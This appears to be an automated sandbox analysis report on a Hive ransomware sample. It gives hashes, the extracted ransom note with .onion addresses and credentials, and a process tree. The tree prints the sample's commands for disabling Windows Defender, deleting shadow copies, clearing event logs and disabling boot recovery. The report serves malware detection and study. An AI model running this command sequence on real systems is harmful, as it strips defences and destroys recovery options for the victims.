Analysis

  • max time kernel
    130s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    24-11-2021 14:30

General

  • Target

    serenb.exe

  • Size

    3.4MB

  • MD5

    177417be748814f6168171a42545f9dd

  • SHA1

    9c8b988e66e0fe6f9dab69b1055e4ee200531094

  • SHA256

    47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35

  • SHA512

    c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2

Malware Config

Extracted

Path

C:\Djfk_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: 8cqCy3hpBgcC Password: CVDT3LgEQvzteorqmxav To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.snwkz files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\serenb.exe
    "C:\Users\Admin\AppData\Local\Temp\serenb.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\system32\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:620
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
          PID:560
      • C:\Windows\system32\net.exe
        net.exe stop "SamSs" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1492
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SamSs" /y
          3⤵
            PID:924
        • C:\Windows\system32\net.exe
          net.exe stop "SDRSVC" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:676
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SDRSVC" /y
            3⤵
              PID:876
          • C:\Windows\system32\net.exe
            net.exe stop "SstpSvc" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:280
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "SstpSvc" /y
              3⤵
                PID:484
            • C:\Windows\system32\net.exe
              net.exe stop "UI0Detect" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1304
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "UI0Detect" /y
                3⤵
                  PID:1148
              • C:\Windows\system32\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1700
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:1064
                • C:\Windows\system32\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1268
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:1680
                  • C:\Windows\system32\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:992
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:792
                    • C:\Windows\system32\sc.exe
                      sc.exe config "NetMsmqActivator" start= disabled
                      2⤵
                        PID:956
                      • C:\Windows\system32\sc.exe
                        sc.exe config "SamSs" start= disabled
                        2⤵
                          PID:1752
                        • C:\Windows\system32\sc.exe
                          sc.exe config "SDRSVC" start= disabled
                          2⤵
                            PID:1012
                          • C:\Windows\system32\sc.exe
                            sc.exe config "SstpSvc" start= disabled
                            2⤵
                              PID:2004
                            • C:\Windows\system32\sc.exe
                              sc.exe config "UI0Detect" start= disabled
                              2⤵
                                PID:1000
                              • C:\Windows\system32\sc.exe
                                sc.exe config "VSS" start= disabled
                                2⤵
                                  PID:880
                                • C:\Windows\system32\sc.exe
                                  sc.exe config "wbengine" start= disabled
                                  2⤵
                                    PID:940
                                  • C:\Windows\system32\sc.exe
                                    sc.exe config "WebClient" start= disabled
                                    2⤵
                                      PID:1328
                                    • C:\Windows\system32\reg.exe
                                      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                      2⤵
                                        PID:2016
                                      • C:\Windows\system32\reg.exe
                                        reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                        2⤵
                                          PID:1496
                                        • C:\Windows\system32\reg.exe
                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                          2⤵
                                            PID:1856
                                          • C:\Windows\system32\reg.exe
                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                            2⤵
                                              PID:1388
                                            • C:\Windows\system32\reg.exe
                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                              2⤵
                                                PID:432
                                              • C:\Windows\system32\reg.exe
                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:812
                                                • C:\Windows\system32\reg.exe
                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                  2⤵
                                                    PID:1760
                                                  • C:\Windows\system32\reg.exe
                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:1064
                                                    • C:\Windows\system32\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:1564
                                                      • C:\Windows\system32\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:1260
                                                        • C:\Windows\system32\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:1952
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:1932
                                                            • C:\Windows\system32\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                              2⤵
                                                                PID:1796
                                                              • C:\Windows\system32\reg.exe
                                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                2⤵
                                                                  PID:928
                                                                • C:\Windows\system32\reg.exe
                                                                  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:612
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:1332
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                      2⤵
                                                                        PID:1720
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                        2⤵
                                                                          PID:1116
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                          2⤵
                                                                            PID:848
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                            2⤵
                                                                              PID:752
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                              2⤵
                                                                                PID:1940
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                2⤵
                                                                                  PID:1256
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                  2⤵
                                                                                    PID:1944
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                    2⤵
                                                                                      PID:1748
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                      2⤵
                                                                                        PID:1392
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                        2⤵
                                                                                          PID:944
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                            PID:1616
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                            2⤵
                                                                                              PID:456
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                              2⤵
                                                                                                PID:1396
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                2⤵
                                                                                                  PID:1148
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                    PID:1292
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    2⤵
                                                                                                    • Modifies security service
                                                                                                    PID:1980
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    2⤵
                                                                                                      PID:756
                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                      vssadmin.exe delete shadows /all /quiet
                                                                                                      2⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:1060
                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                      wevtutil.exe cl system
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1500
                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                      wevtutil.exe cl security
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1244
                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                      wevtutil.exe cl application
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:852
                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                      wmic.exe SHADOWCOPY /nointeractive
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1852
                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                      wmic.exe shadowcopy delete
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:240
                                                                                                    • C:\Windows\system32\bcdedit.exe
                                                                                                      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                      2⤵
                                                                                                      • Modifies boot configuration data using bcdedit
                                                                                                      PID:484
                                                                                                    • C:\Windows\system32\bcdedit.exe
                                                                                                      bcdedit.exe /set {default} recoveryenabled no
                                                                                                      2⤵
                                                                                                      • Modifies boot configuration data using bcdedit
                                                                                                      PID:2000
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                      2⤵
                                                                                                        PID:388
                                                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                          3⤵
                                                                                                          • Deletes Windows Defender Definitions
                                                                                                          PID:1628
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                        2⤵
                                                                                                          PID:888
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                            3⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:988
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                          2⤵
                                                                                                            PID:2104
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                              3⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:2124

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                        Execution

                                                                                                        Command-Line Interface

                                                                                                        1
                                                                                                        T1059

                                                                                                        Persistence

                                                                                                        Modify Existing Service

                                                                                                        2
                                                                                                        T1031

                                                                                                        Defense Evasion

                                                                                                        Impair Defenses

                                                                                                        1
                                                                                                        T1562

                                                                                                        Modify Registry

                                                                                                        2
                                                                                                        T1112

                                                                                                        Disabling Security Tools

                                                                                                        1
                                                                                                        T1089

                                                                                                        Indicator Removal on Host

                                                                                                        1
                                                                                                        T1070

                                                                                                        File Deletion

                                                                                                        2
                                                                                                        T1107

                                                                                                        Credential Access

                                                                                                        Credentials in Files

                                                                                                        1
                                                                                                        T1081

                                                                                                        Collection

                                                                                                        Data from Local System

                                                                                                        1
                                                                                                        T1005

                                                                                                        Impact

                                                                                                        Inhibit System Recovery

                                                                                                        3
                                                                                                        T1490

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                                          MD5

                                                                                                          77a51484f9ceae82d4fa6465a04bd928

                                                                                                          SHA1

                                                                                                          65a6612df040610f5d58ef3b3efa35d8d7bb7bc1

                                                                                                          SHA256

                                                                                                          19f9150c6ce2062757b5a69e0ea00d0d42ba09b1f14e87f1360cb41a196e3164

                                                                                                          SHA512

                                                                                                          ee433697b328b9052cb2baf838dbf04acc4c14528c3ede5150c837decb6d0787d8851ea2d0d5299e477c2fbdc5c3f0d71cc19dc1dd0ab34d3982e3edc2366f19

                                                                                                        • memory/240-120-0x0000000000000000-mapping.dmp
                                                                                                        • memory/280-61-0x0000000000000000-mapping.dmp
                                                                                                        • memory/432-83-0x0000000000000000-mapping.dmp
                                                                                                        • memory/456-106-0x0000000000000000-mapping.dmp
                                                                                                        • memory/484-62-0x0000000000000000-mapping.dmp
                                                                                                        • memory/484-121-0x0000000000000000-mapping.dmp
                                                                                                        • memory/560-56-0x0000000000000000-mapping.dmp
                                                                                                        • memory/612-93-0x0000000000000000-mapping.dmp
                                                                                                        • memory/620-55-0x0000000000000000-mapping.dmp
                                                                                                        • memory/676-59-0x0000000000000000-mapping.dmp
                                                                                                        • memory/752-98-0x0000000000000000-mapping.dmp
                                                                                                        • memory/756-111-0x0000000000000000-mapping.dmp
                                                                                                        • memory/792-70-0x0000000000000000-mapping.dmp
                                                                                                        • memory/812-84-0x0000000000000000-mapping.dmp
                                                                                                        • memory/848-97-0x0000000000000000-mapping.dmp
                                                                                                        • memory/852-117-0x0000000000000000-mapping.dmp
                                                                                                        • memory/876-60-0x0000000000000000-mapping.dmp
                                                                                                        • memory/880-76-0x0000000000000000-mapping.dmp
                                                                                                        • memory/924-58-0x0000000000000000-mapping.dmp
                                                                                                        • memory/928-92-0x0000000000000000-mapping.dmp
                                                                                                        • memory/940-77-0x0000000000000000-mapping.dmp
                                                                                                        • memory/944-104-0x0000000000000000-mapping.dmp
                                                                                                        • memory/956-71-0x0000000000000000-mapping.dmp
                                                                                                        • memory/988-123-0x0000000002A40000-0x0000000002A42000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/988-125-0x0000000002A42000-0x0000000002A44000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/988-126-0x0000000002A44000-0x0000000002A47000-memory.dmp
                                                                                                          Filesize

                                                                                                          12KB

                                                                                                        • memory/988-124-0x000007FEF2180000-0x000007FEF2CDD000-memory.dmp
                                                                                                          Filesize

                                                                                                          11.4MB

                                                                                                        • memory/988-127-0x0000000002A4B000-0x0000000002A6A000-memory.dmp
                                                                                                          Filesize

                                                                                                          124KB

                                                                                                        • memory/992-69-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1000-75-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1012-73-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1060-112-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1064-66-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1064-86-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1116-96-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1148-64-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1148-108-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1244-115-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1256-100-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1260-88-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1268-67-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1292-109-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1304-63-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1328-78-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1332-94-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1388-82-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1392-103-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1396-107-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1492-57-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1496-80-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1500-114-0x000007FEFB6F1000-0x000007FEFB6F3000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/1500-113-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1564-87-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1616-105-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1680-68-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1700-65-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1720-95-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1748-102-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1752-72-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1760-85-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1796-91-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1852-119-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1856-81-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1932-90-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1940-99-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1944-101-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1952-89-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1980-110-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2004-74-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2016-79-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2124-130-0x000007FEF2180000-0x000007FEF2CDD000-memory.dmp
                                                                                                          Filesize

                                                                                                          11.4MB

                                                                                                        • memory/2124-135-0x0000000002434000-0x0000000002437000-memory.dmp
                                                                                                          Filesize

                                                                                                          12KB

                                                                                                        • memory/2124-134-0x0000000002432000-0x0000000002434000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/2124-133-0x000000000243B000-0x000000000245A000-memory.dmp
                                                                                                          Filesize

                                                                                                          124KB

                                                                                                        • memory/2124-132-0x0000000002430000-0x0000000002432000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/2124-131-0x000000001B730000-0x000000001BA2F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.0MB